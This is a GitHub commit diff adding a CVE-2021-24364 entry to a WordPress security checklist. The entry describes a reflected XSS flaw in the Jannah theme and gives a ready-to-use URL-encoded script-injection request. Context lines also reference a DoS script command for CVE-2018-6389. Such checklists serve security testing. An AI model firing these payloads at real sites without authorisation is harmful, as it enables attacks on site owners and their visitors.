Skip to content

Commit fa7bbbd

Browse files
authored
Merge pull request KathanP19#198 from c0ff33b34n/patch-1
CVE-2021-24364
2 parents f1d98f9 + 295af49 commit fa7bbbd

File tree

1 file changed

+11
-0
lines changed

1 file changed

+11
-0
lines changed

CMS/wordpress.md

+11
Original file line numberDiff line numberDiff line change
@@ -6,6 +6,7 @@ Here I will try my best to mention all common security misconfigurations for Wor
66
* General Scan Tool
77
* xmlrpc.php
88
* CVE-2018-6389
9+
* CVE-2021-24364
910
* WP Cornjob DOS
1011
* WP User Enumeration
1112

@@ -89,6 +90,16 @@ python3 doser.py -t 999 -g 'https://site.com/fullUrlFromLoadsxploit'
8990
9091
[Blog Post](https://baraktawily.blogspot.com/2018/02/how-to-dos-29-of-world-wide-websites.html)
9192
93+
# CVE-2021-24364
94+
The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
95+
96+
### Detection and Exploit
97+
* Replace <Your_WP-Site-here> to your WP-site
98+
<Your_WP-Site-here>/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D
99+
* Wait for the pop-up!
100+
101+
### Reference
102+
[NVD](https://nvd.nist.gov/vuln/detail/CVE-2021-24364)
92103
93104
# WP Cornjob DOS
94105
This is another area where you can perform a DOS attack.

0 commit comments

Comments
 (0)